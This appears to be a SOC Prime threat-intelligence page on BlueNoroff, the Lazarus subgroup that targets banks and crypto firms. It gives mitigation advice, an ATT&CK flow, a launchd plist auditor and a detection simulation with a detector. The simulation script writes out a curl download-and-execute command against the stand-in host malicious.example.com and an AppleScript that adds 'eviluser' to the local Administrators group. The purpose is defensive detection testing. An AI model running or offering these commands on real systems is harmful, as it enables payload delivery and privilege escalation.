SOC Prime Bias: Critical

21 Jan 2026 18:58

BlueNoroff Group: The Financial Cybercrime Arm of Lazarus

Ruslan Mikhalov, Chief of Threat Research at SOC Prime

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

BlueNoroff is a financially driven sub-group within the Lazarus ecosystem that focuses on high-value theft operations against banks, cryptocurrency firms, and broader Web3 targets. The group’s playbook spans SWIFT-enabled fraud, watering-hole compromises, supply-chain poisoning of Go packages, and macOS intrusion paths built around fake “job interview” lures. To achieve execution and persistence, BlueNoroff blends a modular Rust/Go malware stack with AppleScript, VBScript, and social-engineering workflows designed to bypass user caution and blend into legitimate development and admin activity.

Investigation

The report tracks BlueNoroff’s trajectory from the 2016 Bangladesh Bank heist through more recent 2025-era supply-chain activity, highlighting how the actor’s tooling and targeting have expanded alongside the crypto/Web3 ecosystem. Researchers outline infrastructure patterns and catalog malware components including GhostCall, GhostHire, RustBucket, and GillyInjector. The investigation also maps observed behaviors to MITRE ATT&CK across stages such as reconnaissance and initial access, then execution, persistence, and credential theft—underscoring a consistent emphasis on stealthy footholds, staged payload delivery, and theft-ready access paths.

Mitigation

Reduce exposure by tightening supply-chain hygiene: validate packages pulled from public registries, enforce pinning and provenance controls, and continuously review dependency updates for unexpected maintainer or code changes. On macOS, harden LaunchAgent/LaunchDaemon governance and monitor for suspicious persistence entries and unsigned tooling. Block look-alike domains used for lure delivery, enforce MFA for privileged identities and externally exposed services, and operationalize detections for known malicious scripts, loaders, and packing techniques associated with the actor. Maintain frequent threat-intelligence updates and reinforce user training focused on spear-phishing and “recruiter/job interview” social engineering patterns.
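The LaunchAgent/LaunchDaemon review called for above can be scripted. The auditor below is an added example written for this page, not SOC Prime's code and not tooling from the referenced report: it parses launchd plists with the Python standard library and flags the traits that fit the persistence style described here (a script interpreter launched with inline code, a program staged under a writable path, a label that imitates Apple's, and a job that relaunches itself). The three plists, their labels and their paths are constructed for the example; the heuristics are a starting point to tune against your own baseline rather than a complete rule set.

```python
"""Audit launchd job plists for persistence traits worth a closer look.

Added example for this page (not SOC Prime's or the referenced report's
code). Uses only the standard library. The plists, labels and paths in
SAMPLE_PLISTS are constructed for the example; the heuristics are a starting
point to tune against your own baseline, not a complete rule set.
"""
from __future__ import annotations

import plistlib

# Interpreters that attacker-authored launch agents often wrap instead of a signed binary.
SCRIPT_INTERPRETERS = {"osascript", "sh", "bash", "zsh", "python", "python3", "perl", "curl"}
# Locations a legitimately installed agent binary should not be loaded from.
WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/", "/Library/Caches/")
# Locations where a job carrying an Apple-style label is expected to live.
SYSTEM_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


def launchd_argv(job: dict) -> list[str]:
    """Effective argv of a launchd job; ProgramArguments takes precedence over Program."""
    if job.get("ProgramArguments"):
        return [str(a) for a in job["ProgramArguments"]]
    if job.get("Program"):
        return [str(job["Program"])]
    return []


def audit_launchd_job(plist_bytes: bytes) -> list[str]:
    """Return human-readable findings for one plist; an empty list means nothing was flagged."""
    job = plistlib.loads(plist_bytes)
    argv = launchd_argv(job)
    if not argv:
        return ["job defines neither Program nor ProgramArguments"]
    exe = argv[0].rsplit("/", 1)[-1]
    label = str(job.get("Label", ""))
    findings: list[str] = []
    if exe in SCRIPT_INTERPRETERS:
        findings.append(f"runs script interpreter '{exe}' directly")
    if any(flag in argv[1:] for flag in ("-e", "-c")):
        findings.append("passes inline code to the interpreter (-e/-c)")
    staged = [a for a in argv if any(p in a for p in WRITABLE_PREFIXES)]
    if staged:
        findings.append(f"references a writable staging path: {staged[0]}")
    if label.startswith("com.apple.") and not argv[0].startswith(SYSTEM_PREFIXES):
        findings.append(f"label '{label}' imitates Apple but runs {argv[0]}")
    # Self-restarting jobs only matter when something else already looks wrong.
    if findings and job.get("RunAtLoad") and job.get("KeepAlive"):
        findings.append("RunAtLoad + KeepAlive relaunch the job at every login and on exit")
    return findings


def audit_all(plists: dict[str, bytes]) -> dict[str, list[str]]:
    """Audit a mapping of plist path -> contents and keep only the flagged ones."""
    return {path: f for path, data in plists.items() if (f := audit_launchd_job(data))}


# Constructed sample plists (paths and labels are illustrative, not real IoCs).
SAMPLE_PLISTS = {
    "/Library/LaunchAgents/com.example.updater.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/updater</string><string>--check</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "/Users/dev/Library/LaunchAgents/com.apple.softwareupdate.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array>
    <string>/usr/bin/osascript</string><string>-e</string>
    <string>do shell script "/Users/Shared/.cache/loader"</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "/Library/LaunchDaemons/com.apple.helper.plist": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.helper</string>
  <key>Program</key><string>/Library/Caches/com.apple.helper/helper</string>
</dict></plist>""",
}

if __name__ == "__main__":
    for path, findings in audit_all(SAMPLE_PLISTS).items():
        print(path)
        for line in findings:
            print("  -", line)
```

To run it against a real host, replace SAMPLE_PLISTS with the contents of `~/Library/LaunchAgents`, `/Library/LaunchAgents` and `/Library/LaunchDaemons`; binary plists are handled by `plistlib.loads` without any change.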

Response

If BlueNoroff indicators are discovered, isolate affected hosts and preserve key evidence, including full command lines, script content, and dropped binaries or package artifacts. Block identified malicious domains and C2 IPs, then execute incident response playbooks aligned to credential theft and supply-chain compromise scenarios. Deploy or tune detections for AppleScript and VBScript execution chains, and for suspicious PowerShell patterns called out in the reporting, then broaden hunting to identify additional endpoints exposed to the same lure, dependency, or infrastructure overlap.

Attack Flow

    graph TB
    %% Class Definitions
    classDef technique fill:#99ccff
    classDef action fill:#ffdd99
    classDef operator fill:#ff9900

    %% Technique Nodes
    gather_identity["<b>Technique</b> – <b>T1589 Gather Victim Identity Information</b><br/>Collects personal, professional, and online information about the target."]
    class gather_identity technique
    search_social["<b>Technique</b> – <b>T1593.001 Search Social Media</b><br/>Queries victim-owned social media accounts to locate useful data."]
    class search_social technique
    phish_info["<b>Technique</b> – <b>T1598.001 Phishing for Information</b><br/>Crafts messages to trick victims into revealing credentials or other data."]
    class phish_info technique
    spearphish_service["<b>Technique</b> – <b>T1566.003 Spearphishing via Service</b><br/>Uses a legitimate online service to deliver malicious content to the victim."]
    class spearphish_service technique
    launch_agent["<b>Technique</b> – <b>T1543.001 Launch Agent</b><br/>Installs a macOS launch agent to achieve persistence."]
    class launch_agent technique
    launch_daemon["<b>Technique</b> – <b>T1543.004 Launch Daemon</b><br/>Installs a macOS launch daemon to achieve persistence."]
    class launch_daemon technique
    tcc_manip["<b>Technique</b> – <b>T1548.006 TCC Manipulation</b><br/>Modifies Transparency, Consent, and Control settings to obtain higher privileges."]
    class tcc_manip technique
    software_packing["<b>Technique</b> – <b>T1027.002 Software Packing</b><br/>Compresses or encrypts the payload to evade analysis."]
    class software_packing technique
    masquerading["<b>Technique</b> – <b>T1036.005 Masquerading</b><br/>Renames files or uses familiar icons to appear legitimate."]
    class masquerading technique
    gui_input["<b>Technique</b> – <b>T1056.002 GUI Input Capture</b><br/>Records keystrokes or mouse input from graphical interfaces to steal credentials."]
    class gui_input technique
    system_info["<b>Technique</b> – <b>T1082 System Information Discovery</b><br/>Collects OS version, hardware details, and installed software."]
    class system_info technique
    data_local["<b>Technique</b> – <b>T1005 Data from Local System</b><br/>Copies files of interest from the infected host."]
    class data_local technique
    local_staging["<b>Technique</b> – <b>T1074.001 Local Data Staging</b><br/>Places collected data in a directory for later exfiltration."]
    class local_staging technique
    web_protocols["<b>Technique</b> – <b>T1071.001 Web Protocols</b><br/>Uses HTTP/HTTPS for command and control traffic."]
    class web_protocols technique
    dead_drop["<b>Technique</b> – <b>T1102.001 Dead Drop Resolver</b><br/>Retrieves instructions from a publicly hosted location."]
    class dead_drop technique
    bidirectional["<b>Technique</b> – <b>T1102.002 Bidirectional C2</b><br/>Allows two-way communication between attacker and malware."]
    class bidirectional technique
    oneway["<b>Technique</b> – <b>T1102.003 One-Way C2</b><br/>Only receives commands from the attacker without sending data back."]
    class oneway technique

    %% Action Nodes
    user_click["<b>Action</b> – User clicks malicious link and downloads payload"]
    class user_click action

    %% Operator Node (optional AND for persistence options)
    op_persistence(("AND"))
    class op_persistence operator

    %% Connections
    gather_identity -->|leads to| search_social
    search_social -->|leads to| phish_info
    phish_info -->|leads to| spearphish_service
    spearphish_service -->|triggers| user_click
    user_click -->|establishes| op_persistence
    op_persistence -->|uses| launch_agent
    op_persistence -->|uses| launch_daemon
    launch_agent -->|enables| tcc_manip
    launch_daemon -->|enables| tcc_manip
    tcc_manip -->|enables| software_packing
    tcc_manip -->|enables| masquerading
    software_packing -->|facilitates| gui_input
    masquerading -->|facilitates| gui_input
    gui_input -->|provides| system_info
    system_info -->|supports| data_local
    data_local -->|prepares| local_staging
    local_staging -->|exfiltrates via| web_protocols
    web_protocols -->|supports| dead_drop
    dead_drop -->|supports| bidirectional
    bidirectional -->|supports| oneway

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands:

    1. AppleScript Execution (T1546.016) – The adversary drops a malicious payload.scpt onto the endpoint (e.g., via a phishing attachment). Using a pre‑installed osascript.exe (bundled with a third‑party tool), they launch the script to execute a PowerShell payload that adds a new local administrator account.
    2. ClickFix Clipboard Delivery (T1204.004) – The attacker copies a crafted command to the clipboard that invokes curl with a Zoom‑style user‑agent to download a second‑stage payload, then immediately executes it via cmd.exe. The command also includes an inline powershell.exe -c call to run the payload in memory.
  • Regression Test Script: The script below reproduces both behaviors in a deterministic way.

    #----- BEGIN REGRESSION TEST SCRIPT -----
    # Ensure we are running with administrative privileges
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
        Write-Error "Run this script as Administrator."
        exit 1
    }

    # 1. AppleScript execution via osascript.exe (assumed to be on PATH, as described in the narrative)
    $appleScriptPath = Join-Path $env:TEMP "malicious.scpt"
    # Single-quoted here-string: no variable expansion, so the AppleScript's own \" escapes survive.
    # The closing '@ must be the first characters on its line when the script is saved.
    Set-Content -Path $appleScriptPath -Value @'
    tell application "System Events"
        do shell script "powershell -c \"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'\""
    end tell
    '@
    # Execute the AppleScript
    Start-Process -FilePath "osascript.exe" -ArgumentList "`"$appleScriptPath`"" -NoNewWindow -Wait

    # 2. ClickFix style clipboard delivery
    $payloadPath = Join-Path $env:TEMP "payload.exe"
    # Double-quoted so $payloadPath expands here, not inside cmd.exe (which does not understand $env:)
    $clickFixCmd = "curl -A `"ZoomSDK`" http://malicious.example.com/payload.exe -o `"$payloadPath`" && powershell.exe -c `"Start-Process '$payloadPath'`""
    # Run via cmd.exe to match rule condition. The example domain does not resolve, so curl fails and the
    # second stage never runs; the cmd.exe command line is the telemetry this step exists to produce.
    Start-Process -FilePath "cmd.exe" -ArgumentList "/c $clickFixCmd" -NoNewWindow -Wait

    # Cleanup: remove artifacts
    Remove-Item -Path $appleScriptPath -Force -ErrorAction SilentlyContinue
    Remove-Item -Path $payloadPath -Force -ErrorAction SilentlyContinue
    # End of script
    #----- END REGRESSION TEST SCRIPT -----
  • Cleanup Commands: Remove any lingering processes, files, and the test user account.

    # Stop any lingering processes (defensive – normally not needed).
    # Exclude the current PowerShell session, otherwise this line terminates the cleanup itself.
    Get-Process -Name "osascript","cmd","powershell","payload" -ErrorAction SilentlyContinue |
        Where-Object { $_.Id -ne $PID } |
        Stop-Process -Force

    # Delete temporary files
    Remove-Item -Path (Join-Path $env:TEMP "malicious.scpt") -Force -ErrorAction SilentlyContinue
    Remove-Item -Path (Join-Path $env:TEMP "payload.exe") -Force -ErrorAction SilentlyContinue

    # Remove the test admin account if it was created
    if (Get-LocalUser -Name "eviluser" -ErrorAction SilentlyContinue) {
        Remove-LocalUser -Name "eviluser"
    }
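The two chains the simulation above is meant to produce, and the AppleScript and PowerShell execution chains the Response section says to detect, can be checked against process-creation telemetry with a small detector. The Python below is an added example for this page, not SOC Prime's code and not the rule from the detection stack: it evaluates constructed process events (parent image, image, command line) against two conditions that mirror the regression script and leaves the benign events untouched. The event shape and every sample event are assumptions made for the example; the paths and the `osascript.exe` location are constructed.

```python
"""Detect the two simulated chains over process-creation events.

Added example for this page (not SOC Prime's detection content). The event
shape (parent_image, image, command_line) and every event in SAMPLE_EVENTS are
constructed for the example; they mirror the command lines of the regression
test above.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the parent process image
    image: str          # full path of the created process image
    command_line: str   # command line as recorded by the sensor


# PowerShell or net.exe adding a member to the local Administrators group.
RE_ADMIN_GROUP = re.compile(
    r"Add-LocalGroupMember\b.*-Group\s+['\"]?Administrators"
    r"|\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add",
    re.IGNORECASE,
)
# curl invoked with a User-Agent that contains "zoom" (the ClickFix lure style).
RE_CURL_ZOOM_UA = re.compile(
    r"\bcurl(?:\.exe)?\b.*?(?:-A|--user-agent)\s+[\"']?[^\s\"']*zoom", re.IGNORECASE
)
# PowerShell started with an inline command (-c / -Command / -EncodedCommand).
RE_INLINE_PS = re.compile(
    r"\bpowershell(?:\.exe)?\s+.*?(?:-c|-command|-enc\w*)\s", re.IGNORECASE
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(event: ProcessEvent) -> list[str]:
    """Return the names of the conditions an event satisfies (empty if none)."""
    parent = basename(event.parent_image)
    image = basename(event.image)
    cmd = event.command_line
    hits: list[str] = []
    # Chain 1: an AppleScript interpreter spawns PowerShell that changes the local Administrators group.
    if parent.startswith("osascript") and image.startswith("powershell") and RE_ADMIN_GROUP.search(cmd):
        hits.append("T1546.016 osascript -> PowerShell local Administrators change")
    # Chain 2: cmd.exe runs curl with a Zoom-style UA chained straight into inline PowerShell.
    if image.startswith("cmd") and RE_CURL_ZOOM_UA.search(cmd) and RE_INLINE_PS.search(cmd):
        hits.append("T1204.004 ClickFix: curl (Zoom UA) chained into inline PowerShell")
    return hits


def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Index and matched conditions for every event that satisfied at least one condition."""
    return [(i, hits) for i, e in enumerate(events) if (hits := detect(e))]


PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OSASCRIPT_EXE = r"C:\Program Files\ThirdPartyTool\osascript.exe"   # constructed location
TEMP = r"C:\Users\analyst\AppData\Local\Temp"                        # constructed temp dir

SAMPLE_EVENTS = [
    # 0: routine admin use of PowerShell, should not match
    ProcessEvent(r"C:\Windows\explorer.exe", PS_EXE,
                 'powershell.exe -NoProfile -c "Get-Process | Sort-Object CPU"'),
    # 1: child of osascript.exe, as produced by step 1 of the regression test
    ProcessEvent(OSASCRIPT_EXE, PS_EXE,
                 "powershell -c \"Add-LocalGroupMember -Group 'Administrators' -Member 'eviluser'\""),
    # 2: cmd.exe command line from step 2 of the regression test
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 f'cmd.exe /c curl -A "ZoomSDK" http://malicious.example.com/payload.exe -o "{TEMP}\\payload.exe" '
                 f'&& powershell.exe -c "Start-Process \'{TEMP}\\payload.exe\'"'),
    # 3: developer curl with an ordinary UA and no PowerShell, should not match
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 'cmd.exe /c curl -A "Mozilla/5.0" https://api.example.com/health'),
    # 4: osascript spawning PowerShell for something harmless, should not match
    ProcessEvent(OSASCRIPT_EXE, PS_EXE, 'powershell -c "Get-Date"'),
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {'; '.join(hits)}")
```

Both conditions key on the parent/child relationship plus the command line rather than on the file name alone, which is why event 4 (osascript launching an innocuous PowerShell one-liner) is not reported; if your sensor does not record the parent image, the first condition loses most of its precision and should be paired with the script-content capture the Response section recommends.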